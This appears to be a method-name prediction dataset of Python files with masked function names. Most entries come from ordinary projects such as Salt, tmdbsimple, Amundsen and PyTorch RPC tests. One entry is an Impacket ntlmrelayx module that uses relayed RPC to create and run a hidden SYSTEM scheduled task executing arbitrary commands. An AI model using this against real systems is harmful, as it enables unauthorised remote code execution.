label
stringlengths 1
61
| code
stringlengths 4k
8k
| code_compressed
null |
---|---|---|
test loaded modules are loaded mods | """
Tests for salt.loader.lazy
"""
import sys
import pytest
import salt.loader
import salt.loader.context
import salt.loader.lazy
import salt.utils.files
@pytest.fixture
def loader_dir(tmp_path):
"""
Create a simple directory with a couple modules to load and run tests
against.
"""
mod_contents = """
def __virtual__():
return True
def set_context(key, value):
__context__[key] = value
def get_context(key):
return __context__[key]
"""
with pytest.helpers.temp_file(
"mod_a.py", directory=tmp_path, contents=mod_contents
), pytest.helpers.temp_file("mod_b.py", directory=tmp_path, contents=mod_contents):
yield str(tmp_path)
def test_loaders_have_uniq_context(loader_dir):
"""
Loaded functions run in the LazyLoader's context.
"""
opts = {"optimization_order": [0, 1, 2]}
loader_1 = salt.loader.lazy.LazyLoader([loader_dir], opts)
loader_2 = salt.loader.lazy.LazyLoader([loader_dir], opts)
loader_1._load_all()
loader_2._load_all()
assert loader_1.pack["__context__"] == {}
assert loader_2.pack["__context__"] == {}
loader_1["mod_a.set_context"]("foo", "bar")
assert loader_1.pack["__context__"] == {"foo": "bar"}
assert loader_1["mod_b.get_context"]("foo") == "bar"
with pytest.raises(KeyError):
loader_2["mod_a.get_context"]("foo")
assert loader_2.pack["__context__"] == {}
def test_loaded_methods_are_loaded_func(loader_dir):
"""
Functions loaded from LazyLoader's item lookups are LoadedFunc objects
"""
opts = {"optimization_order": [0, 1, 2]}
loader_1 = salt.loader.lazy.LazyLoader([loader_dir], opts)
fun = loader_1["mod_a.get_context"]
assert isinstance(fun, salt.loader.lazy.LoadedFunc)
def METHOD_NAME(loader_dir):
"""
Modules looked up as attributes of LazyLoaders are LoadedMod objects.
"""
opts = {"optimization_order": [0, 1, 2]}
loader_1 = salt.loader.lazy.LazyLoader([loader_dir], opts)
mod = loader_1.mod_a
assert isinstance(mod, salt.loader.lazy.LoadedMod)
def test_loaders_create_named_loader_contexts(loader_dir):
"""
LazyLoader's create NamedLoaderContexts on the modules the load.
"""
opts = {"optimization_order": [0, 1, 2]}
loader_1 = salt.loader.lazy.LazyLoader([loader_dir], opts)
mod = loader_1.mod_a
assert isinstance(mod.mod, str)
func = mod.set_context
assert isinstance(func, salt.loader.lazy.LoadedFunc)
module_name = func.func.__module__
module = sys.modules[module_name]
assert isinstance(module.__context__, salt.loader.context.NamedLoaderContext)
wrapped_module_name = func.__module__
wrapped_module = sys.modules[wrapped_module_name]
assert isinstance(
wrapped_module.__context__, salt.loader.context.NamedLoaderContext
)
assert module is wrapped_module
def test_loaders_convert_context_to_values(loader_dir):
"""
LazyLoaders convert NamedLoaderContexts to values when instantiated.
"""
loader_context = salt.loader.context.LoaderContext()
grains_default = {
"os": "linux",
}
grains = salt.loader.context.NamedLoaderContext(
"grains", loader_context, grains_default
)
opts = {
"optimization_order": [0, 1, 2],
"grains": grains,
}
loader_1 = salt.loader.lazy.LazyLoader([loader_dir], opts)
assert loader_1.opts["grains"] == grains_default
# The loader's opts is a copy
assert opts["grains"] == grains
def test_missing_loader_from_salt_internal_loaders():
with pytest.raises(RuntimeError):
salt.loader._module_dirs(
{"extension_modules": "/tmp/foo"}, "missingmodules", "module"
)
def test_loader_pack_always_has_opts(loader_dir):
loader = salt.loader.lazy.LazyLoader([loader_dir], opts={"foo": "bar"})
assert "__opts__" in loader.pack
assert "foo" in loader.pack["__opts__"]
assert loader.pack["__opts__"]["foo"] == "bar"
def test_loader_pack_opts_not_overwritten(loader_dir):
opts = {"foo": "bar"}
loader = salt.loader.lazy.LazyLoader(
[loader_dir],
opts={"foo": "bar"},
pack={"__opts__": {"baz": "bif"}},
)
assert "__opts__" in loader.pack
assert "foo" not in loader.pack["__opts__"]
assert "baz" in loader.pack["__opts__"]
assert loader.pack["__opts__"]["baz"] == "bif" | null |
run | # Impacket - Collection of Python classes for working with network protocols.
#
# Copyright (C) 2023 Fortra. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Authors:
# Arseniy Sharoglazov <[email protected]> / Positive Technologies (https://www.ptsecurity.com/)
# Based on @agsolino and @_dirkjan code
#
import time
import string
import random
from impacket import LOG
from impacket.dcerpc.v5 import tsch
from impacket.dcerpc.v5.dtypes import NULL
from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
PROTOCOL_ATTACK_CLASS = "RPCAttack"
class TSCHRPCAttack:
def _xml_escape(self, data):
replace_table = {
"&": "&",
'"': """,
"'": "'",
">": ">",
"<": "<",
}
return ''.join(replace_table.get(c, c) for c in data)
def _run(self):
# Here PUT YOUR CODE!
tmpName = ''.join([random.choice(string.ascii_letters) for _ in range(8)])
cmd = "cmd.exe"
args = "/C %s" % self.config.command
LOG.info('Executing command %s in no output mode via %s' % (self.config.command, self.stringbinding))
xml = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers>
<CalendarTrigger>
<StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
<Enabled>true</Enabled>
<ScheduleByDay>
<DaysInterval>1</DaysInterval>
</ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Principals>
<Principal id="LocalSystem">
<UserId>S-1-5-18</UserId>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="LocalSystem">
<Exec>
<Command>%s</Command>
<Arguments>%s</Arguments>
</Exec>
</Actions>
</Task>
""" % (self._xml_escape(cmd), self._xml_escape(args))
LOG.info('Creating task \\%s' % tmpName)
tsch.hSchRpcRegisterTask(self.dce, '\\%s' % tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
LOG.info('Running task \\%s' % tmpName)
done = False
tsch.hSchRpcRun(self.dce, '\\%s' % tmpName)
while not done:
LOG.debug('Calling SchRpcGetLastRunInfo for \\%s' % tmpName)
resp = tsch.hSchRpcGetLastRunInfo(self.dce, '\\%s' % tmpName)
if resp['pLastRuntime']['wYear'] != 0:
done = True
else:
time.sleep(2)
LOG.info('Deleting task \\%s' % tmpName)
tsch.hSchRpcDelete(self.dce, '\\%s' % tmpName)
LOG.info('Completed!')
class RPCAttack(ProtocolAttack, TSCHRPCAttack):
PLUGIN_NAMES = ["RPC"]
def __init__(self, config, dce, username):
ProtocolAttack.__init__(self, config, dce, username)
self.dce = dce
self.rpctransport = dce.get_rpc_transport()
self.stringbinding = self.rpctransport.get_stringbinding()
def METHOD_NAME(self):
# Here PUT YOUR CODE!
# Assume the endpoint is TSCH
# TODO: support relaying RPC to different endpoints
# TODO: support for providing a shell
# TODO: support for getting an output
if self.config.command is not None:
TSCHRPCAttack._run(self)
else:
LOG.error("No command provided to attack") | null |
images | # -*- coding: utf-8 -*-
"""
tmdbsimple.people
~~~~~~~~~~~~~~~~~
This module implements the People and Credits functionality of tmdbsimple.
Created by Celia Oakley on 2013-10-31.
:copyright: (c) 2013-2022 by Celia Oakley
:license: GPLv3, see LICENSE for more details
"""
from .base import TMDB
class People(TMDB):
"""
People functionality.
See: https://developers.themoviedb.org/3/people
"""
BASE_PATH = 'person'
URLS = {
'info': '/{id}',
'changes': '/{id}/changes',
'movie_credits': '/{id}/movie_credits',
'tv_credits': '/{id}/tv_credits',
'combined_credits': '/{id}/combined_credits',
'external_ids': '/{id}/external_ids',
'images': '/{id}/images',
'tagged_images': '/{id}/tagged_images',
'translations': '/{id}/translations',
'latest': '/latest',
'popular': '/popular',
}
def __init__(self, id=0):
super(People, self).__init__()
self.id = id
def info(self, **kwargs):
"""
Get the primary person details by id.
Supports append_to_response. Read more about this at
https://developers.themoviedb.org/3/getting-started/append-to-response.
Args:
language: (optional) ISO 639-1 code.
append_to_response: (optional) Append requests within the same
namespace to the response.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_id_path('info')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def changes(self, **kwargs):
"""
Get the changes for a person. By default only the last 24 hours are returned.
You can query up to 14 days in a single query by using the start_date
and end_date query parameters.
Args:
start_date: (optional) Filter the results with a start date.
Expected format is 'YYYY-MM-DD'.
end_date: (optional) Filter the results with a end date.
Expected format is 'YYYY-MM-DD'.
page: (optional) Minimum 1, maximum 1000, default 1.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_id_path('changes')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def movie_credits(self, **kwargs):
"""
Get the movie credits for a person.
Args:
language: (optional) ISO 639-1 code.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_id_path('movie_credits')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def tv_credits(self, **kwargs):
"""
Get the TV show credits for a person.
You can query for some extra details about the credit with the credit
method.
Args:
language: (optional) ISO 639-1 code.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_id_path('tv_credits')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def combined_credits(self, **kwargs):
"""
Get the movie and TV credits together in a single response.
Args:
language: (optional) ISO 639-1 code.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_id_path('combined_credits')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def external_ids(self, **kwargs):
"""
Get the external ids for a person. We currently support the following external sources.
External Sources
- IMDB ID
- Facebook
- Freebase MID
- Freebase ID
- Instagram
- TVRage ID
- Twitter
Args:
language: (optional) ISO 639-1 code.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_id_path('external_ids')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def METHOD_NAME(self, **kwargs):
"""
Get the images for a person.
Args:
None
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_id_path('images')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def tagged_images(self, **kwargs):
"""
Get the images that this person has been tagged in.
Args:
language: (optional) ISO 639-1 code.
page: (optional) Minimum 1, maximum 1000, default 1.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_id_path('tagged_images')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def translations(self, **kwargs):
"""
Get a list of translations that have been created for a person.
Args:
language: (optional) ISO 639-1 code.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_id_path('translations')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def latest(self, **kwargs):
"""
Get the most newly created person. This is a live response and will
continuously change.
Args:
language: (optional) ISO 639-1 code.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_path('latest')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def popular(self, **kwargs):
"""
Get the list of popular people on TMDb. This list updates daily.
Args:
language: (optional) ISO 639-1 code.
page: (optional) Minimum 1, maximum 1000, default 1.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_path('popular')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
class Credits(TMDB):
"""
Credits functionality.
See: https://developers.themoviedb.org/3/credits
"""
BASE_PATH = 'credit'
URLS = {
'info': '/{credit_id}',
}
def __init__(self, credit_id):
super(Credits, self).__init__()
self.credit_id = credit_id
def info(self, **kwargs):
"""
Get a movie or TV credit details by id.
Args:
None
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_credit_id_path('info')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response | null |
get writer | # Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import csv
import logging
import os
import shutil
from csv import DictWriter
from typing import (
Any, Dict, FrozenSet,
)
from pyhocon import ConfigFactory, ConfigTree
from databuilder.job.base_job import Job
from databuilder.loader.base_loader import Loader
from databuilder.models.graph_serializable import GraphSerializable
from databuilder.serializers import neo4_serializer
from databuilder.utils.closer import Closer
LOGGER = logging.getLogger(__name__)
class FsNeo4jCSVLoader(Loader):
"""
Write node and relationship CSV file(s) that can be consumed by
Neo4jCsvPublisher.
It assumes that the record it consumes is instance of Neo4jCsvSerializable
"""
# Config keys
NODE_DIR_PATH = 'node_dir_path'
RELATION_DIR_PATH = 'relationship_dir_path'
FORCE_CREATE_DIR = 'force_create_directory'
SHOULD_DELETE_CREATED_DIR = 'delete_created_directories'
_DEFAULT_CONFIG = ConfigFactory.from_dict({
SHOULD_DELETE_CREATED_DIR: True,
FORCE_CREATE_DIR: False
})
def __init__(self) -> None:
self._node_file_mapping: Dict[Any, DictWriter] = {}
self._relation_file_mapping: Dict[Any, DictWriter] = {}
self._keys: Dict[FrozenSet[str], int] = {}
self._closer = Closer()
def init(self, conf: ConfigTree) -> None:
"""
Initializing FsNeo4jCsvLoader by creating directory for node files
and relationship files. Note that the directory defined in
configuration should not exist.
:param conf:
:return:
"""
conf = conf.with_fallback(FsNeo4jCSVLoader._DEFAULT_CONFIG)
self._node_dir = conf.get_string(FsNeo4jCSVLoader.NODE_DIR_PATH)
self._relation_dir = \
conf.get_string(FsNeo4jCSVLoader.RELATION_DIR_PATH)
self._delete_created_dir = \
conf.get_bool(FsNeo4jCSVLoader.SHOULD_DELETE_CREATED_DIR)
self._force_create_dir = conf.get_bool(FsNeo4jCSVLoader.FORCE_CREATE_DIR)
self._create_directory(self._node_dir)
self._create_directory(self._relation_dir)
def _create_directory(self, path: str) -> None:
"""
Validate directory does not exist, creates it, register deletion of
created directory function to Job.closer.
:param path:
:return:
"""
if os.path.exists(path):
if self._force_create_dir:
LOGGER.info('Directory exist. Deleting directory %s', path)
shutil.rmtree(path)
else:
raise RuntimeError(f'Directory should not exist: {path}')
os.makedirs(path)
def _delete_dir() -> None:
if not self._delete_created_dir:
LOGGER.warning('Skip Deleting directory %s', path)
return
LOGGER.info('Deleting directory %s', path)
shutil.rmtree(path)
# Directory should be deleted after publish is finished
Job.closer.register(_delete_dir)
def load(self, csv_serializable: GraphSerializable) -> None:
"""
Writes Neo4jCsvSerializable into CSV files.
There are multiple CSV files that this method writes.
This is because there're not only node and relationship, but also it
can also have different nodes, and relationships.
Common pattern for both nodes and relations:
1. retrieve csv row (a dict where keys represent a header,
values represent a row)
2. using this dict to get a appropriate csv writer and write to it.
3. repeat 1 and 2
:param csv_serializable:
:return:
"""
node = csv_serializable.next_node()
while node:
node_dict = neo4_serializer.serialize_node(node)
key = (node.label, self._make_key(node_dict))
file_suffix = '{}_{}'.format(*key)
node_writer = self.METHOD_NAME(node_dict,
self._node_file_mapping,
key,
self._node_dir,
file_suffix)
node_writer.writerow(node_dict)
node = csv_serializable.next_node()
relation = csv_serializable.next_relation()
while relation:
relation_dict = neo4_serializer.serialize_relationship(relation)
key2 = (relation.start_label,
relation.end_label,
relation.type,
self._make_key(relation_dict))
file_suffix = f'{key2[0]}_{key2[1]}_{key2[2]}_{key2[3]}'
relation_writer = self.METHOD_NAME(relation_dict,
self._relation_file_mapping,
key2,
self._relation_dir,
file_suffix)
relation_writer.writerow(relation_dict)
relation = csv_serializable.next_relation()
def METHOD_NAME(self,
csv_record_dict: Dict[str, Any],
file_mapping: Dict[Any, DictWriter],
key: Any,
dir_path: str,
file_suffix: str
) -> DictWriter:
"""
Finds a writer based on csv record, key.
If writer does not exist, it's creates a csv writer and update the
mapping.
:param csv_record_dict:
:param file_mapping:
:param key:
:param file_suffix:
:return:
"""
writer = file_mapping.get(key)
if writer:
return writer
LOGGER.info('Creating file for %s', key)
file_out = open(f'{dir_path}/{file_suffix}.csv', 'w', encoding='utf8')
writer = csv.DictWriter(file_out, fieldnames=csv_record_dict.keys(),
quoting=csv.QUOTE_NONNUMERIC)
def file_out_close() -> None:
LOGGER.info('Closing file IO %s', file_out)
file_out.close()
self._closer.register(file_out_close)
writer.writeheader()
file_mapping[key] = writer
return writer
def close(self) -> None:
"""
Any closeable callable registered in _closer, it will close.
:return:
"""
self._closer.close()
def get_scope(self) -> str:
return "loader.filesystem_csv_neo4j"
def _make_key(self, record_dict: Dict[str, Any]) -> int:
""" Each unique set of record keys is assigned an increasing numeric key """
return self._keys.setdefault(frozenset(record_dict.keys()), len(self._keys)) | null |
publish event | import json
import logging
import signal
from django.utils.functional import cached_property
from google.api_core.exceptions import AlreadyExists
from google.cloud import pubsub_v1
logger = logging.getLogger('zentral.core.queues.backends.google_pubsub.consumer')
class BaseWorker:
name = "UNDEFINED"
subscription_id = "UNDEFINED"
ack_deadline_seconds = None
counters = None
def __init__(self, topic, credentials):
self.topic = topic
self.credentials = credentials
# subscriber API
@cached_property
def subscriber_client(self):
self.log_debug("initialize subscriber client")
return pubsub_v1.SubscriberClient(credentials=self.credentials)
@cached_property
def subscription_path(self):
self.log_debug("build subscription path")
project_id = self.topic.split("/")[1]
return pubsub_v1.SubscriberClient.subscription_path(project_id, self.subscription_id)
def ensure_subscription(self):
self.log_debug("ensure subscription")
# create or update subscription
sub_kwargs = {
'name': self.subscription_path,
'topic': self.topic,
}
if self.ack_deadline_seconds is not None:
sub_kwargs["ack_deadline_seconds"] = self.ack_deadline_seconds
try:
self.subscriber_client.create_subscription(request=sub_kwargs)
except AlreadyExists:
self.log_info("subscription %s already exists", self.subscription_path)
# verify filter
config_filter = sub_kwargs.pop("filter", "")
response = self.subscriber_client.get_subscription(request={"subscription": self.subscription_path})
if response.filter != config_filter:
self.log_error("existing subscription %s has a different filter: '%s'",
self.subscription_path, response.filter)
raise ValueError
# update ack_deadline_seconds if necessary
config_ack_deadline_seconds = sub_kwargs.get("ack_deadline_seconds")
if config_ack_deadline_seconds and config_ack_deadline_seconds != response.ack_deadline_seconds:
self.log_info("update subcription %s ack_deadline_seconds", self.subscription_path)
subscription = pubsub_v1.types.Subscription(**sub_kwargs)
update_mask = pubsub_v1.types.FieldMask(paths=["ack_deadline_seconds"])
self.subscriber_client.update_subscription(
request={"subscription": subscription, "update_mask": update_mask}
)
else:
self.log_info("subscription %s created", self.subscription_path)
# metrics
def start_metrics_exporter(self, metrics_exporter):
if not self.counters:
self.log_error("Could not start metric exporters: no counters")
return
self.metrics_exporter = metrics_exporter
if self.metrics_exporter:
for name, label in self.counters:
self.metrics_exporter.add_counter(name, [label])
self.metrics_exporter.start()
def inc_counter(self, name, label):
if self.metrics_exporter:
self.metrics_exporter.inc(name, label)
# logging
def log(self, msg, level, *args):
logger.log(level, f"{self.name} - {msg}", *args)
def log_debug(self, msg, *args):
self.log(msg, logging.DEBUG, *args)
def log_error(self, msg, *args):
self.log(msg, logging.ERROR, *args)
def log_exception(self, msg, *args):
logger.exception(f"{self.name} - {msg}", *args)
def log_info(self, msg, *args):
self.log(msg, logging.INFO, *args)
# run
def do_handle_signal(self):
raise NotImplementedError
def handle_signal(self, signum, frame):
if signum == signal.SIGTERM:
signum = "SIGTERM"
elif signum == signal.SIGINT:
signum = "SIGINT"
self.log_debug("received signal %s", signum)
return self.do_handle_signal()
def do_run(self):
raise NotImplementedError
def run(self, metrics_exporter=None):
self.log_info("run")
self.exit_code = 0
# subscription
try:
self.ensure_subscription()
except ValueError:
self.exit_code = 1
else:
# signals
signal.signal(signal.SIGTERM, self.handle_signal)
signal.signal(signal.SIGINT, self.handle_signal)
# metrics
self.start_metrics_exporter(metrics_exporter)
self.do_run()
return self.exit_code
class Consumer(BaseWorker):
def __init__(self, topic, credentials):
super().__init__(topic, credentials)
self.pull_future = None
def shutdown(self, error=False):
self.log_info("shutdown")
if self.pull_future:
self.log_info("cancel pull future")
self.pull_future.cancel()
self.log_info("wait for pull future")
self.pull_future.result()
self.log_info("pull future shut down")
def callback(self, message):
return
def do_handle_signal(self):
self.shutdown()
def do_run(self):
# async pull
self.log_info("start async pull")
self.pull_future = self.subscriber_client.subscribe(self.subscription_path, self.callback)
with self.subscriber_client:
try:
self.pull_future.result()
except Exception:
self.log_exception("Shutdown because of pull future exception")
self.exit_code = 1
self.shutdown()
class ConsumerProducer(Consumer):
def __init__(self, in_topic, out_topic, credentials):
super().__init__(in_topic, credentials)
self.out_topic = out_topic
@cached_property
def producer_client(self):
return pubsub_v1.PublisherClient(credentials=self.credentials)
def METHOD_NAME(self, event, machine_metadata):
message = json.dumps(event.serialize(machine_metadata=machine_metadata)).encode("utf-8")
kwargs = {"event_type": event.event_type}
if event.metadata.routing_key:
kwargs["routing_key"] = event.metadata.routing_key
self.producer_client.publish(self.out_topic, message, **kwargs) | null |
is running | import errno
import os
import shlex
import socket
import signal
import tempfile
import types
from subprocess import Popen
from time import sleep
import outer_packages
import jsonrpclib
# uses Unix sockets for determine running process.
# (assumes used daemons will register proper socket)
# all daemons should use -p argument as listening tcp port and check_connectivity RPC method
class SingletonDaemon(object):
# run_cmd can be function of how to run daemon or a str to run at subprocess
def __init__(self, name, tag, port, run_cmd, dir = None):
self.name = name
self.tag = tag
self.port = port
self.run_cmd = run_cmd
self.dir = dir
self.stop = self.kill # alias
if ' ' in tag:
raise Exception('Error: tag should not include spaces')
if dir and not os.path.exists(dir):
print('Warning: path given for %s: %s, does not exist' % (name, dir))
# returns True if daemon is running
def METHOD_NAME(self):
try:
lock_socket = register_socket(self.tag) # the check is ~200000 faster and more reliable than checking via 'netstat' or 'ps' etc.
lock_socket.shutdown(socket.SHUT_RDWR)
lock_socket.close()
except socket.error: # Unix socket in use
return True
sleep(0.5)
# Unix socket is not used, but maybe it's old version of daemon not using socket
return bool(self.get_pid_by_listening_port())
# get pid of running daemon by registered Unix socket (most robust way)
def get_pid_by_unix_socket(self):
ret_code, stdout, stderr = run_command('netstat -px')
if ret_code:
raise Exception('Error running netstat: %s' % [ret_code, stdout, stderr])
for line in stdout.splitlines():
line_arr = line.strip().split()
if len(line_arr) == 8 and line_arr[0] == 'unix' and line_arr[4] == 'DGRAM' and line_arr[7] == '@%s' % self.tag:
return int(line_arr[6].split('/', 1)[0])
# get pid of running daemon by listening tcp port (for backward compatibility)
def get_pid_by_listening_port(self):
ret_code, stdout, stderr = run_command('netstat -tlnp')
if ret_code:
raise Exception('Error running netstat: %s' % [ret_code, stdout, stderr])
for line in stdout.splitlines():
line_arr = line.strip().split()
if len(line_arr) == 7 and line_arr[3] == '0.0.0.0:%s' % self.port:
if '/' not in line_arr[6]:
raise Exception('Expecting pid/program name in netstat line of using port %s, got: %s' % (self.port, line))
return int(line_arr[6].split('/')[0])
# get PID of running process, None if not found
def get_pid(self):
pid = self.get_pid_by_unix_socket()
if pid:
return pid
pid = self.get_pid_by_listening_port()
if pid:
return pid
def kill_by_signal(self, pid, signal_name, timeout):
os.kill(pid, signal_name)
poll_rate = 0.1
for i in range(int(timeout / poll_rate)):
if not self.METHOD_NAME():
return True
sleep(poll_rate)
# kill daemon, with verification
def kill(self, timeout = 15):
pid = self.get_pid()
if not pid:
raise Exception('%s is not running' % self.name)
# try Ctrl+C, usual kill, kill -9
for signal_name in [signal.SIGINT, signal.SIGTERM, signal.SIGKILL]:
if self.kill_by_signal(pid, signal_name, timeout):
return True
raise Exception('Could not kill %s, even with -9' % self.name)
# try connection as RPC client, return True upon success, False if fail
def check_connectivity(self, timeout = 15):
daemon = jsonrpclib.Server('http://127.0.0.1:%s/' % self.port, timeout = timeout)
poll_rate = 0.1
for i in range(int(timeout/poll_rate)):
try:
daemon.check_connectivity()
return True
except socket.error: # daemon is not up yet
sleep(poll_rate)
return False
# start daemon
# returns True if success, False if already running
def start(self, timeout = 20):
if self.METHOD_NAME():
raise Exception('%s is already running' % self.name)
if not self.run_cmd:
raise Exception('No starting command registered for %s' % self.name)
if type(self.run_cmd) is types.FunctionType:
self.run_cmd()
return
with tempfile.TemporaryFile() as stdout_file, tempfile.TemporaryFile() as stderr_file:
proc = Popen(shlex.split('%s -p %s' % (self.run_cmd, self.port)), cwd = self.dir, close_fds = True,
stdout = stdout_file, stderr = stderr_file)
if timeout > 0:
poll_rate = 0.1
for i in range(int(timeout/poll_rate)):
if self.METHOD_NAME():
break
sleep(poll_rate)
if bool(proc.poll()): # process ended with error
stdout_file.seek(0)
stderr_file.seek(0)
raise Exception('Run of %s ended unexpectfully: %s' % (self.name, [proc.returncode, stdout_file.read().decode(errors = 'replace'), stderr_file.read().decode(errors = 'replace')]))
elif proc.poll() == 0: # process runs other process, and ended
break
if self.METHOD_NAME():
if self.check_connectivity():
return True
raise Exception('Daemon process is running, but no connectivity')
raise Exception('%s failed to run.' % self.name)
# restart the daemon
def restart(self, timeout = 15):
if self.METHOD_NAME():
self.kill(timeout)
sleep(0.5)
return self.start(timeout)
# provides unique way to determine running process, should be used inside daemon
def register_socket(tag):
global lock_socket # Without this our lock gets garbage collected
lock_socket = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
try:
lock_socket.bind('\0%s' % tag)
return lock_socket
except socket.error:
raise socket.error('Error: process with tag %s is already running.' % tag)
# runs command
def run_command(command, timeout = 15, cwd = None):
# pipes might stuck, even with timeout
with tempfile.TemporaryFile() as stdout_file, tempfile.TemporaryFile() as stderr_file:
proc = Popen(shlex.split(command), stdout = stdout_file, stderr = stderr_file, cwd = cwd, close_fds = True)
if timeout > 0:
poll_rate = 0.1
for i in range(int(timeout/poll_rate)):
sleep(poll_rate)
if proc.poll() is not None: # process stopped
break
if proc.poll() is None:
proc.kill() # timeout
return (errno.ETIME, '', 'Timeout on running: %s' % command)
else:
proc.wait()
stdout_file.seek(0)
stderr_file.seek(0)
return (proc.returncode, stdout_file.read().decode(errors = 'replace'), stderr_file.read().decode(errors = 'replace')) | null |
test remote timeout to here in jit | from typing import Dict, Tuple
import torch
import torch.distributed.rpc as rpc
from torch import Tensor
from torch.distributed.rpc import RRef
from torch.testing._internal.dist_utils import (
dist_init,
worker_name,
wait_until_pending_futures_and_users_flushed
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
@torch.jit.script
def two_args_two_kwargs(
first_arg,
second_arg,
first_kwarg=torch.tensor([3, 3]),
second_kwarg=torch.tensor([4, 4]),
):
return first_arg + second_arg + first_kwarg + second_kwarg
@torch.jit.script
def script_rpc_async_call(
dst_worker_name: str, args: Tuple[Tensor, Tensor], kwargs: Dict[str, Tensor]
):
fut = rpc.rpc_async(dst_worker_name, two_args_two_kwargs, args, kwargs)
ret = fut.wait()
return ret
@torch.jit.script
def rpc_async_call_with_timeout(
dst_worker_name: str,
args: Tuple[Tensor, Tensor],
kwargs: Dict[str, Tensor],
timeout: float,
):
fut = rpc.rpc_async(dst_worker_name, two_args_two_kwargs, args, kwargs, timeout)
ret = fut.wait()
return ret
@torch.jit.script
def rpc_async_call_with_timeout_future_ret(
dst_worker_name: str,
args: Tuple[Tensor, Tensor],
kwargs: Dict[str, Tensor],
timeout: float,
):
fut = rpc.rpc_async(dst_worker_name, two_args_two_kwargs, args, kwargs, timeout)
return fut
@torch.jit.script
def rpc_async_call_future_ret(
dst_worker_name: str, args: Tuple[Tensor, Tensor], kwargs: Dict[str, Tensor]
):
fut = rpc.rpc_async(dst_worker_name, two_args_two_kwargs, args, kwargs)
return fut
@torch.jit.script
def rref_to_here(rref_var: RRef[Tensor]) -> Tensor:
return rref_var.to_here()
@torch.jit.script
def rref_to_here_with_timeout(rref_var: RRef[Tensor], timeout: float) -> Tensor:
return rref_var.to_here(timeout)
@torch.jit.script
def rpc_async_with_rref_arg(dst_worker_name: str, args: Tuple[RRef[Tensor]]) -> Tensor:
fut = rpc.rpc_async(dst_worker_name, rref_to_here, args)
ret = fut.wait()
return ret
class JitFaultyAgentRpcTest(RpcAgentTestFixture):
"""
Run tests for rpc_async in JIT under the faulty agent test fixture to test
arbitrary timeouts.
"""
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_CALL": 1.5})
def test_timeout_in_torchscript_function(self):
# Call rpc_async + fut.wait() in torchscript function and ensure that
# timeout is raised.
if self.rank != 0:
return
dst_worker_name = worker_name((self.rank + 1) % self.world_size)
args = (torch.tensor([1, 1]), torch.tensor([2, 2]))
kwargs = {
"first_kwarg": torch.tensor([2, 2]),
"second_kwarg": torch.tensor([3, 3]),
}
expected_error = self.get_timeout_error_regex()
# Ensure that we get a timeout if we override the default timeout and
# the RPC takes longer to execute.
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc_async_call_with_timeout(dst_worker_name, args, kwargs, 0.5)
# Ensure that we timeout if we don't specify a timeout but the default
# is less than the RPC takes to execute.
rpc._set_rpc_timeout(0.001)
with self.assertRaisesRegex(RuntimeError, expected_error):
script_rpc_async_call(
dst_worker_name, args, kwargs
)
# Ensure that we run to completion if zero timeout is specified.
ret = rpc_async_call_with_timeout(dst_worker_name, args, kwargs, 0)
self.assertEqual(ret, torch.tensor([8, 8]))
# reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_CALL": 1.5})
def test_timeout_in_python(self):
# Ensures timeouts are raised if we call rpc_async from within a
# torchscript function, but wait on the future in python.
if self.rank != 0:
return
dst_worker_name = worker_name((self.rank + 1) % self.world_size)
args = (torch.tensor([1, 1]), torch.tensor([2, 2]))
kwargs = {
